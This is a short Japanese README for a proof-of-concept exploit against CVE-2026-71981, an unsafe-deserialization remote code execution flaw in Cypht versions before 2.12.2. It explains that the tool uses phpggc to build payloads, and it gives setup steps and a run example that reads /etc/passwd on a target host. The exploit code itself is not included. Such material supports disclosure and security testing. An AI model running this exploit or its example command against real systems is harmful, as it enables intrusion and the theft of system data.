
CVE-2026-71981の概念実証エクスプロイト。Cyphtにおける安全でないデシリアライゼーションによるRCEです。コマンドを実行し、ログアウト応答を介して出力を表示します。ペイロード生成にはphpggcが必要です。
これはCVE-2026-71981(安全でないデシリアライゼーションによるRCE)のPoCです。実行したコマンドの結果は、ログアウトリクエストのレスポンス内の</body></html>タグの後に出力されます。レスポンス全体も表示するには--print-allを使用してください。
影響を受けるバージョン: < v2.12.2
このスクリプトは、unserialize()ペイロードを生成するために https://github.com/ambionics/phpggc のインストールが必要です。
セットアップと実行例:
python3 -m venv .venv
source ./.venv/bin/activate
python3 -m pip install -r requirements.txt
python3 ./poc.py --ip 127.0.0.1 --username admin --password admin --command "cat /etc/passwd"
python3 ./poc.py --help